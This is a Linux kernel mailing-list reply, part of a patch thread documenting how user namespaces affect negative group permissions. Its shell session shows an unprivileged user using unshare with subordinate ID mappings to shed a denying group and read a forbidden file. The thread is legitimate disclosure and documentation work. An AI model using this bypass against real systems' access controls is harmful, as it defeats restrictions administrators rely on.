From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on aws-us-west-2-korg-lkml-1.web.codeaurora.org Received: from vger.kernel.org (vger.kernel.org [23.128.96.18]) by smtp.lore.kernel.org (Postfix) with ESMTP id 96CEBC83F12 for ; Tue, 29 Aug 2023 21:33:23 +0000 (UTC) Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S238989AbjH2Vcy convert rfc822-to-8bit (ORCPT ); Tue, 29 Aug 2023 17:32:54 -0400 Received: from lindbergh.monkeyblade.net ([23.128.96.19]:55478 "EHLO lindbergh.monkeyblade.net" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S238972AbjH2Vcw (ORCPT ); Tue, 29 Aug 2023 17:32:52 -0400 Received: from lithops.sigma-star.at (lithops.sigma-star.at [195.201.40.130]) by lindbergh.monkeyblade.net (Postfix) with ESMTPS id 0F5D6A8; Tue, 29 Aug 2023 14:32:50 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lithops.sigma-star.at (Postfix) with ESMTP id 9E58A6418DB0; Tue, 29 Aug 2023 23:32:48 +0200 (CEST) Received: from lithops.sigma-star.at ([127.0.0.1]) by localhost (lithops.sigma-star.at [127.0.0.1]) (amavisd-new, port 10032) with ESMTP id YgmQcxzRH_Oh; Tue, 29 Aug 2023 23:32:48 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by lithops.sigma-star.at (Postfix) with ESMTP id 429676234895; Tue, 29 Aug 2023 23:32:48 +0200 (CEST) Received: from lithops.sigma-star.at ([127.0.0.1]) by localhost (lithops.sigma-star.at [127.0.0.1]) (amavisd-new, port 10026) with ESMTP id 6_dEfwL520lh; Tue, 29 Aug 2023 23:32:48 +0200 (CEST) Received: from lithops.sigma-star.at (lithops.sigma-star.at [195.201.40.130]) by lithops.sigma-star.at (Postfix) with ESMTP id 183AF6418DB5; Tue, 29 Aug 2023 23:32:48 +0200 (CEST) Date: Tue, 29 Aug 2023 23:32:47 +0200 (CEST) From: Richard Weinberger To: Alejandro Colomar Cc: "Serge E. Hallyn" , christian@brauner.io, ipedrosa@redhat.com, gscrivan@redhat.com, Andreas =?utf-8?Q?Gr=C3=BCnbacher?= , acl-devel@nongnu.org, linux-man@vger.kernel.org, linux-api@vger.kernel.org, linux-fsdevel , ebiederm Message-ID: <1972367750.1870193.1693344767957.JavaMail.zimbra@nod.at> In-Reply-To: <81098c50-bfec-9aa2-a302-abfebd0ff332@kernel.org> References: <20230829205833.14873-1-richard@nod.at> <81098c50-bfec-9aa2-a302-abfebd0ff332@kernel.org> Subject: Re: [PATCH 0/3] Document impact of user namespaces and negative permissions MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8BIT X-Originating-IP: [195.201.40.130] X-Mailer: Zimbra 8.8.12_GA_3807 (ZimbraWebClient - FF97 (Linux)/8.8.12_GA_3809) Thread-Topic: Document impact of user namespaces and negative permissions Thread-Index: oqD1ROdFWsR4JsLdGEfYUyxCctkaCw== Precedence: bulk List-ID: X-Mailing-List: linux-fsdevel@vger.kernel.org ----- Ursprüngliche Mail ----- > Von: "Alejandro Colomar" > Can you please provide a small shell session where this is exemplified? Sure. I sent the following to the shadow maintainers privately on Friday, but since the issue is already known for years I don't hesitate to share. # On a Debian Bookworm # So far no entries are installed. $ cat /etc/subuid # useradd automatically does so. $ useradd -m rw $ cat /etc/subuid rw:100000:65536 # Let's create a folder where the group "nogames" has no permissions. $ mkdir /games $ echo win > /games/game.txt $ groupadd nogames $ chown -R root:nogames /games $ chmod 705 /games # User "rw" must not play games $ usermod -G nogames rw # Works as expected rw@localhost:~$ id uid=1000(rw) gid=1000(rw) groups=1000(rw),1001(nogames) rw@localhost:~$ cat /games/game.txt cat: /games/game.txt: Permission denied # By using unshare (which utilizes the newuidmap helper) we can get rid of the "nogames" group. rw@localhost:~$ unshare -S 0 -G 0 --map-users=100000,0,65536 --map-groups=100000,0,65536 id uid=0(root) gid=0(root) groups=0(root) rw@localhost:~$ unshare -S 0 -G 0 --map-users=100000,0,65536 --map-groups=100000,0,65536 cat /games/game.txt win Thanks, //richard